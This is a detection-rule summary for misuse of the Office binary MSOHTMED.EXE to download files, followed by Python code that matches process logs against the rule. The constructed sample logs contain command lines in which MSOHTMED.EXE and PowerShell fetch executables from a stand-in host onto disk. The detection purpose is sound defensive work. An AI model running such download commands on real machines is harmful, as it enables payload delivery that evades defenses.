
Summary
This detection rule identifies potentially malicious use of MSOHTMED.EXE, a Microsoft Office binary that can download arbitrary files from the internet over protocols such as HTTP, HTTPS, and FTP. The executable is known to be leveraged in attacks to evade defenses and perform unwanted downloads, and this behaviour is commonly mapped to execution tactics in the MITRE ATT&CK framework. The rule triggers on process creation events in which MSOHTMED.EXE is launched, or invoked, with a command line containing a suspicious URL; a match requires that both the process image path and the command line parameters conform to the rule's specified patterns. False positives are expected, since the tool has a range of legitimate uses. The rule supports detection efforts aimed at strengthening the security posture against evasion tactics in Windows environments.
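The two-part condition the summary describes (an image-path pattern plus a URL in the command line) can be applied to process-creation logs as shown below. This is an added example and is not the rule's own code or the project's: the Sysmon-style field names Image and CommandLine, the exact suffix and URL patterns, and every path and URL in the sample records are assumptions or constructed values.

```python
# Added example (not the rule's own code): applies the summary's two-part
# condition to constructed Sysmon-style process-creation records.
# Field names (Image, CommandLine) and the exact match patterns are assumptions.
import re

# Assumed match patterns: the image path ends in the MSOHTMED binary and the
# command line carries a URL for one of the protocols named in the summary.
IMAGE_SUFFIX = "\\msohtmed.exe"
URL_PATTERN = re.compile(r"(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample records in a Sysmon-like "Field: value" layout, one
# record per blank-line-separated block. All paths and URLs are made up.
SAMPLE_LOG = r"""
EventID: 1
Image: C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE
CommandLine: "C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE" https://files.example.invalid/update.bin C:\Users\Public\update.bin

EventID: 1
Image: C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE
CommandLine: "C:\Program Files\Microsoft Office\root\Office16\MSOHTMED.EXE" C:\Users\alice\report.doc C:\Users\alice\report.htm

EventID: 1
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe -c "iwr https://files.example.invalid/update.bin"

EventID: 1
Image: c:\program files\microsoft office\root\office16\msohtmed.exe
CommandLine: msohtmed.exe FTP://files.example.invalid/tool.exe C:\Temp\tool.exe
"""


def parse_records(text):
    """Split the text into records; each record becomes a dict of field -> value."""
    records = []
    for block in text.strip().split("\n\n"):
        record = {}
        for line in block.splitlines():
            # Only the first ": " separates the field name from its value, so
            # URLs ("https://...") inside the command line are left intact.
            key, _, value = line.partition(": ")
            record[key.strip()] = value.strip()
        records.append(record)
    return records


def matches_rule(record):
    """Both conditions must hold: MSOHTMED image path AND a URL in the command line.

    Image comparison is case-insensitive because Windows paths are, and the
    URL pattern is case-insensitive so that 'FTP://' is not missed.
    """
    image = record.get("Image", "").lower()
    command_line = record.get("CommandLine", "")
    return image.endswith(IMAGE_SUFFIX) and URL_PATTERN.search(command_line) is not None


def find_matches(text):
    """Return every parsed record that satisfies the rule."""
    return [record for record in parse_records(text) if matches_rule(record)]


if __name__ == "__main__":
    for hit in find_matches(SAMPLE_LOG):
        print("MATCH:", hit["Image"], "|", hit["CommandLine"])
```

Of the four constructed records, only the first and last match: the second is MSOHTMED.EXE converting a local document with no URL on the command line, which is the kind of legitimate use behind the acknowledged false positives, and the third carries a URL but under a different image, so it falls outside this rule's scope.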
Categories
- Windows
- Endpoint
Data Sources
- Process
- Application Log
Created: 2022-08-19